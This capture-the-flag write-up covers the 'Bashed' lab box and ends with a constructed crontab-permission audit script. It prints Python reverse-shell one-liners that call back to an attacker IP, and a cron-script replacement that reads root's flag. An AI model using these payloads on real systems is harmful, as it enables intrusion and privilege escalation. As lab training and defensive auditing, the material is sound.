Bashed is an easy Linux box that can be exploited by discovering a PHP web shell named ‘phpbash.php’ on the web server. Privileges can be escalated by exploiting a cron job that is running as root.
Nmap discovered the following open ports and services:
nmap -sC -sV -oN fullscan -Pn 10.129.24.131

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
The first thing I checked was the web server. The user is presented with the following:
I checked the source code with ctrl + u but found nothing relevant, so I started a directory brute-force with the following command:
This gives the following results:
/images (Status: 301)
/uploads (Status: 301)
/php (Status: 301)
/css (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/server-status (Status: 403)
Each of these directories was brute-forced individually, and it turned out that the dev directory has directory indexing enabled. So you can simply navigate to 10.129.24.131/dev/ and see that there are two files. Both are web shells from which you can execute commands on the server.
To obtain a reverse shell, the following payload from Pentest Monkey was used:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.33",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
This is a Python reverse shell, which opens a shell as the www-data user. By navigating to the home directory you will see a user named arrexel, whose home directory contains user.txt.
Next up is trying to escalate privileges to root. Checking sudo -l gave the following result:

$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
The root directory contains a directory called scripts. However, this was only accessible by the user scriptmanager. For simplicity, a new Python reverse shell was executed as the scriptmanager user (because www-data can run commands as scriptmanager), as shown below:
sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.33",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Notice the first part of this command, which makes it execute as the scriptmanager user. This will give you a reverse shell as scriptmanager. Now you can enter the scripts directory, where you will find two files: a Python file that is being run as a cron job by root (notice the timestamp) and a text file with root permissions. At this point it is pretty obvious that you can replace the test.py file with something like this:

import os
os.system("cat /root/root.txt > powned.txt")
After this you have to wait a minute, and you will find a newly created text file powned.txt containing the root flag.
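The root cause of this privilege escalation is a root cron job whose script (and its directory) can be modified by a lower-privileged user. As an added defensive example, not part of the original writeup, the audit below parses /etc/crontab-style entries and flags any referenced path that is owned by a different uid or is group/world-writable. The crontab text and staged files are constructed; path_root and trusted_uid are assumptions added so the check can run against a staged tree as an unprivileged user.

```python
import os, re, stat, tempfile
# Constructed sample in /etc/crontab format: m h dom mon dow user command
SAMPLE_CRONTAB = """
*/1 * * * *   root    python /scripts/test.py
0 3 * * *     root    /usr/local/bin/backup.sh --quiet
"""
PATH_RE = re.compile(r"(/[^\s;|&]+)")

def audit_crontab(crontab_text, path_root="", trusted_uid=0):
    """Return (cron_user, path, reasons) for each absolute path in a cron command that a uid
    other than trusted_uid could modify; path_root (an assumption) lets it run on a staged tree."""
    findings = []
    for line in crontab_text.splitlines():
        fields = line.split(None, 6)
        if len(fields) < 7 or fields[0].startswith("#"):
            continue  # blank, comment, or not a well-formed system crontab line
        cron_user, command = fields[5], fields[6]
        for path in PATH_RE.findall(command):
            reasons = []
            # Check the file and its directory: a writable directory lets the file be swapped out.
            for label, target in (("", path), ("parent dir ", os.path.dirname(path))):
                try:
                    st = os.stat(path_root + target)
                except FileNotFoundError:
                    continue
                if st.st_uid != trusted_uid:
                    reasons.append(label + "owned by uid %d" % st.st_uid)
                if st.st_mode & stat.S_IWGRP:
                    reasons.append(label + "group-writable")
                if st.st_mode & stat.S_IWOTH:
                    reasons.append(label + "world-writable")
            if reasons:
                findings.append((cron_user, path, reasons))
    return findings

def demo():
    """Stage a world-writable script (like the box's test.py) next to a safe one."""
    with tempfile.TemporaryDirectory() as staged:
        for d in ("/scripts", "/usr/local/bin"):
            os.makedirs(staged + d)
            os.chmod(staged + d, 0o755)
        for name, mode in (("/scripts/test.py", 0o666), ("/usr/local/bin/backup.sh", 0o755)):
            with open(staged + name, "w") as f:
                f.write("# constructed placeholder\n")
            os.chmod(staged + name, mode)
        return audit_crontab(SAMPLE_CRONTAB, staged, trusted_uid=os.getuid())

if __name__ == "__main__":
    for user, path, reasons in demo():
        print("cron as %s runs %s: %s" % (user, path, ", ".join(reasons)))
```

Run against a real host with path_root="" and trusted_uid=0, only the backup.sh-style entry should come back clean; any finding on a root entry is the same condition this box was rooted through.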